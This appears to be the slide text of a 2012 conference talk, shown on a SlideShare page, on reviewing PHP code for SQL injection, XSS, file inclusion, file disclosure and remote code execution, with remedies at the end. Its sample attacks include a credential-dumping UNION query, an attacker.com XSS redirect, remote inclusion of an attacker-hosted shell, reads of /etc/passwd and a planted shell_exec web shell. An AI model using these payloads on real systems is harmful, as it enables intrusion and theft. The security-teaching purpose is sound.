Spot the Web Vulnerability

6,756 views
6,484 views

Published on

These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.

Published in: Technology
1 Comment
3 Likes
Statistics
Notes
  • Thanks ! Great material/studies/and work !
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total views
6,756
On SlideShare
0
From Embeds
0
Number of Embeds
39
Actions
Shares
0
Downloads
75
Comments
1
Likes
3
Embeds 0
No embeds

No notes for slide

Spot the Web Vulnerability

  1. 1. Spot the WebVulnerabilityMiroslav Štampar (dev@sqlmap.org)
  2. 2. Talk overview Introduction to commonly exploited web application vulnerability classes (covering only those caused by coding mistake(s)) Usage of code review on real-life vulnerabilities as an educational tool Mitigation in form of remedies Note: While given examples will discuss PHP coding (due to its overwhelming popularity on the Web), the concepts also apply to any other web programming language October 13th, 2012 2
  3. 3. Vulnerability statistics (1) October 13th, 2012 3
  4. 4. Vulnerability statistics (2) Name Visits Platform DatevBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability 31961 php 2010-08-29WordPress <= 3.3.1 Multiple Vulnerabilities 25960 php 2012-01-25WordPress 3.1.3 SQL Injection Vulnerabilities 25168 php 2011-07-01Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection 24166 php 2011-07-21Vulnerability 0-dayvBulletin(R) 3.8.6 faq.php Information Disclosure 22850 php 2010-07-24VulnerabilityvBulletin 4.0.x => 4.1.2 (search.php) SQL Injection 19074 php 2011-05-23VulnerabilityBypass the JQuery-Real-Person captcha plugin 0-day 17089 php 2011-11-28FCKeditor all version Arbitrary File Upload Vulnerability 16211 php 2011-08-09Joomla 1.5 URL Redirecting Vulnerability 16061 php 2010-08-24WordPress TimThumb Plugin - Remote Code Execution 15991 php 2011-08-03 October 13th, 2012 4
  5. 5. SQL injection (1) Vulnerability on dynamic database queries that include unfiltered user supplied input Usually result of concatenation of raw parameter values to a desired SQL statement Various techniques used depending on targets environment and affected vulnerable query The goal is unauthorized access to the underlying database Involved in 60% of all breach incidents examined by 7Safe in 2010 October 13th, 2012 5
  6. 6. SQL injection (2) Example of vulnerable code (vuln.php): <?php ... $sql = "SELECT * FROM forum_logs WHERE id = " . $_GET["id"]; $result = mysql_query($sql); ... ?> Sample attack: http://www.target.com/vuln.php?id=1 UNION ALL SELECT NULL,CONCAT(user,0x3a,password),NULL FROM mysql.user-- October 13th, 2012 6
  7. 7. Cross-site scripting (1) Enables attackers to inject client-side script into web pages viewed by other users Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible Persistent (stored) and non-persistent (reflected) variants Samy (JS.Spacehero), first known XSS worm, infected over 1 million MySpace profiles in less than 20 hours October 13th, 2012 7
  8. 8. Cross-site scripting (2) Example of vulnerable code (vuln.php): <?php $name = $_GET[name]; echo "Welcome $name<br>"; echo "<a href="http://www.site.com/">Click to Visit</a>"; ?> Sample attack: http://www.target.com/vuln.php? name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href ="http://www.attacker.com/";}</script> October 13th, 2012 8
  9. 9. File inclusion (1) Allows inclusion of arbitrary code into vulnerable application for further execution Local file (LFI) and remote file (RFI) variants Attackers fondest wish (especially RFI) Access anything that the original program context is able to (configuration files, password files, etc.) Involved in 21% of all web application attacks observed by Imperva in 2011 October 13th, 2012 9
  10. 10. File inclusion (2) Example of vulnerable code (vuln.php): <?php $page = index; if (isset($_REQUEST[page])) $page = $_REQUEST[page]; include($page . .php); ?> Sample attack: http://www.target.com/vuln.php? page=http://www.attacker.com/shell.php?foo= October 13th, 2012 10
  11. 11. File disclosure (1) Access files that are not intended to be accessible and expose their content to the attackers Directory traversal variant in cases when characters for traverse to the parent directory (e.g. ../) are passed through to the file API(s) Local file inclusion becomes a variant too if used for obtaining a non-script content Easiest for exploitation October 13th, 2012 11
  12. 12. File disclosure (2) Example of vulnerable code (vuln.php): <?php $template = default.php; if (isset($_COOKIE[template])) $template = $_COOKIE[template]; readfile("templates/" . $template); ?> Sample attack: GET /vuln.php HTTP/1.0 Cookie: template= ../../../../../../../../../etc/passwd October 13th, 2012 12
  13. 13. Remote code execution (1) Provides a way to execute arbitrary code In one variant provided code is being executed inside the vulnerable web application (e.g. eval) In other, more common, content of one of request parameters is being written to the browser reachable file, giving attacker opportunity to run it as a standalone script TimThumb WordPress PHP plugin vulnerability (CVE: 2011-4106) affected 1.2 million websites October 13th, 2012 13
  14. 14. Remote code execution (2) Example of vulnerable code (vuln.php): <?php $fp = fopen("prefs/timezone.php", "w"); fwrite($fp, "<?phprn$timezone=" . $_REQUEST[tz] . ";rn?>"); fclose($fp); ?> Sample attack: http://www.target.com/vuln.php? tz=us;shell_exec($_GET[cmd]) http://www.target.com/prefs/timezone.php?cmd=cat /etc/passwd October 13th, 2012 14
  15. 15. Spot SQL injection (1) (EDB-ID: 18820, CVE: 2012-1002, if (isset($_POST[authornum]) && ctype_digit($_POST[authornum])) { OpenConf <= 4.11 OSVDB-ID: 78996) $oc_authorNum = $_POST[authornum]; } else { $anr = ocsql_query("SELECT * FROM `" . OCC_TABLE_PAPER . "` WHERE `paperid`=" . safeSQLstr($_POST[pid])) or err("Unable to retrieve submission information"); if (mysql_num_rows($anr) != 1) { err(oc_(Submission ID or password entered is incorrect)); } October 13th, 2012 15
  16. 16. Spot SQL injection (2) (EDB-ID: 19264, OSVDB-ID: 83231) if(empty($cookies[language])){ setcookie(MyTickets_language, MyTickets <= v2.0.8 $setting[default_language],time()+86400,"/"); $language = $setting[default_language]; } else { if($db->count(languages,"`id`=". $cookies[language]."") == 0){ $language = $setting[default_language]; } $language = $cookies[language]; } $language_array = $db->fetch($db->query("SELECT * FROM `languages` WHERE `id`=".$language."")); October 13th, 2012 16
  17. 17. WP-Predict Plugin for WordPress <= v1.0Spot SQL injection (3) foreach ($postPredicts as $postPredict){ (EDB-ID: 19715, OSVDB-ID: 83697) ... if ($_POST[postAction] == "submitVote" && intval($_POST[predictId]) == $postPredict- >predictId) { $submitPredictId = $_POST[predictId]; $selectedOption = $_POST[predictSelection]; ... $dbResult = @$wpdb->query("INSERT INTO " . $wpdb->prefix . "wpp_predict_votes (predictEntryId, predictUserId, predictSelectedOption) VALUES (" . $submitPredictId . ", " . $user_ID . ", " . $selectedOption . ")"); ... } October 13th, 2012 17
  18. 18. Spot SQL injection (4) (EDB-ID: 18516, OSVDB-ID: 79497) $start[year] = isset($_GET[sy]) ? phpDenora <= v1.4.6 htmlspecialchars($_GET[sy]) : date(Y); $start[month] = isset($_GET[sm]) ? htmlspecialchars($_GET[sm]) : date(m); $start[day] = isset($_GET[sd]) ? htmlspecialchars($_GET[sd]) : date(d); ... $sidq = sql_query("SELECT `id` FROM $table WHERE year = ".$start[year]." AND month = ". $start[month]." AND day = ".$start[day].""); October 13th, 2012 18
  19. 19. AdRotate Plugin for WordPress <= v3.6.6Spot SQL injection (5) (EDB-ID: 18114, CVE: 2011-4671, if(isset($_GET[track]) OR $_GET[track] != ) { OSVDB-ID: 77507) $meta = base64_decode($_GET[track]); ... list($ad, $group, $block) = explode("-", $meta); ... $bannerurl = $wpdb->get_var($wpdb- >prepare("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = ".$ad." LIMIT 1;")); ... } October 13th, 2012 19
  20. 20. WP Bannerize Plugin for WordPress <= v2.8.7Spot SQL injection (6) (EDB-ID: 17906, OSVDB-ID: 76658) if (@isset($_SERVER[HTTP_X_REQUESTED_WITH])) { ... $limit = intval($_POST[limit]); $page_offset = (intval($_POST[offset]) - 1) * $limit; foreach($_POST["item"] as $key => $value){ $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset), $value); $result = mysql_query($sql); } } October 13th, 2012 20
  21. 21. Spot cross-site scripting (1) (EDB-ID: 11017, OSVDB-ID: 61594) PHPDug <= v2.0.0 $page = new HtmlTemplate("templates/" . $config[tpl_name] . "/index.html"); ... $page->SetParameter(UPCOMING_LINK, $config[site_url].upcoming.php?id=.$_GET[id]); $page->SetParameter(POPULAR_LINK, $config[site_url].index.php); ... $page->CreatePageEcho($lang,$config); October 13th, 2012 21
  22. 22. Spot cross-site scripting (2) function _wp_comment_row($comment_id, $mode, (EDB-ID: 9250, CVE: 2009-2851, $comment_status, $checkbox = true, $from_ajax = WordPress <= v2.8.1 false) { OSVDB-ID: 56193) $comment = get_comment($comment_id); ... $author_url = get_comment_author_url(); ... $author_url_display = $author_url; ... echo "<a title=$author_url href= $author_url>$author_url_display</a><br/>"; ... } ... foreach ($comments as $comment) _wp_comment_row($comment->comment_ID, $mode, $comment_status); October 13th, 2012 22
  23. 23. Spot cross-site scripting (3) damianov.net Shoutbox <= v1.0 $handle = fopen($shoutsFile,"a"); $toWrite="n".stripslashes($_POST["txtNick"]) . "|" . $_POST["txtEmail"] . "|" . stripslashes($_POST["txtShout"]); (EDB-ID: 12593) fwrite($handle, $toWrite); fclose($handle); ... $lines = array_reverse(file($shoutsFile)); foreach ($lines as $line_num => $line) { $info = explode("|", $line, 3); if ((is_email($info[1])) && $displayEmails) $info[0] = "<a href=mailto:" . $info[1] . ">" . $info[0] . "</a>"; echo "<div style=$fontStyle><b>$info[0]</b> : " . ($allowHTML ? $info[2] : strip_tags($info[2])) . "</div>n"; // CVE-2004-0595 (strip_tags() bypass) } October 13th, 2012 23
  24. 24. Spot file inclusion (1) (EDB-ID: 15166, OSVDB-ID: 68300) Zen Cart <= v1.3.9f $typefilter = default; if (isset($_GET[typefilter])) $typefilter = $_GET[typefilter]; require(DIR_WS_INCLUDES . zen_get_index_filters_directory($typefilter . _filter.php)); October 13th, 2012 24
  25. 25. Spot file inclusion (2) (EDB-ID: 19550, OSVDB-ID: 83700) if (isset($_POST[lang]) && preg_replace("#.*/#","", phpMyBackupPro <= v2.2 $_SERVER[PHP_SELF])=="config.php" $CONF[lang]=$_POST[lang]; if (!isset($CONF[lang])) $CONF[lang]="english"; if (!file_exists($prepath.PMBP_LANGUAGE_DIR. $CONF[lang].".inc.php")) include_once($prepath.PMBP_LANGUAGE_DIR . "english.inc.php"); else include($prepath.PMBP_LANGUAGE_DIR . $CONF[lang].".inc.php"); October 13th, 2012 25
  26. 26. Relocate Upload Plugin for WordPress <=Spot file inclusion (3) (EDB-ID: 17869, CVE: 2012-1205, OSVDB-ID: 79250) if (isset($_GET[ru_folder])) { v0.14 define(WP_USE_THEMES, false); require_once(urldecode($_GET[abspath]) . /wp-load.php); ... } October 13th, 2012 26
  27. 27. Spot file disclosure (1) ISPworker <= v1.23 (EDB-ID: 10262) header(Content-type: . $_REQUEST[type]); header(Content-Disposition: attachment; filename=" . $_REQUEST[filename] . "); readfile("./tmp/$ticketid" . "_" . $_REQUEST[filename]); October 13th, 2012 27
  28. 28. PICA Photo Gallery Plugin for WordPress <=Spot file disclosure (2) (EDB-ID: 19016, OSVDB-ID: 82702) $timg = $imgname = $_REQUEST[imgname]; $pluginName = pica-photo-gallery; $file = dirname(dirname(dirname(__FILE__))) . "/uploads/" . $pluginName . "/" . $timg; header(Content-Description: File Transfer); v1.0 header(Content-Type: application/octet-stream); ... header(Content-Length: . filesize($file)); ob_clean(); flush(); readfile($file); October 13th, 2012 28
  29. 29. Spot remote code execution (1) (EDB-ID: 18775, CVE: 2012-1495, $file = ../includes/settings.php; ... WebCalendar <= v1.2.4 $settings[single_user_login] = getPostValue OSVDB-ID: 81329) (form_single_user_login); ... $fd = @fopen ($file, w+b, false); ... fwrite ($fd, "<?phprn"); fwrite ($fd, /* updated via install/index.php on . date (r) . "rn"); foreach ($settings as $k => $v) { if ($v != <br /> && $v != ) fwrite ($fd, $k . : . $v . "rn"); } October 13th, 2012 29
  30. 30. Spot remote code execution (2) Ajax File and Image Manager <= v1.0 (EDB-ID: 18075, CVE: 2011-4825, @ob_start(); displayArray($_POST); writeInfo(@ob_get_clean()); OSVDB-ID: 76928) ... function writeInfo($data, $die = false) { $fp = @fopen(dirname(__FILE__) . DIRECTORY_SEPARATOR . data.php, w+); @fwrite($fp, $data); @fwrite($fp, "nn" . date(d/M/Y H:i:s)); @fclose($fp); ... } October 13th, 2012 30
  31. 31. Remedies (1) Data validation Process of ensuring that application is running with correct data Discard if it doesn’t pass the validation process if (!preg_match(/^(?d{3})?[-s.]?d{3}[-s.]d{4}$/, $phone)) { echo "Your phone number is invalid"; die(); } October 13th, 2012 31
  32. 32. Remedies (2) Data sanitization Removing any unwanted bits from the data and normalizing it to the correct form $comment = strip_tags($_POST[comment]); ... $id = intval($_GET[id]); ... $username = preg_replace(/[^a-zA-Z0-9._]/, , $_REQUEST[username]); ... $query = sprintf("SELECT * FROM users WHERE user=%s AND password=%s", mysql_real_escape_string($user), mysql_real_escape_string($password)); October 13th, 2012 32
  33. 33. Remedies (3) Output escaping Protecting integrity of displayed data Prevents browser from applying any unintended meaning to any special sequence of characters that may be found Always escape output provided by users! echo "You searched for: " . htmlspecialchars($_GET["query"], ENT_QUOTES); October 13th, 2012 33
  34. 34. Remedies (4) Safe communication with a database Prepared statements use one channel for commands and another one for data (which never allows commands) $db = new PDO(dblib:host=localhost; dbname=testdb; charset=UTF-8, $user, $pass); $query = SELECT * FROM users WHERE id = :id; $stmt = $db->prepare($query); $stmt->bindValue(:id, $_REQUEST[id]); $stmt->execute(); while($row = $stmt->fetch(PDO::FETCH_ASSOC)) { ... October 13th, 2012 34
  35. 35. Questions? October 13th, 2012 35

×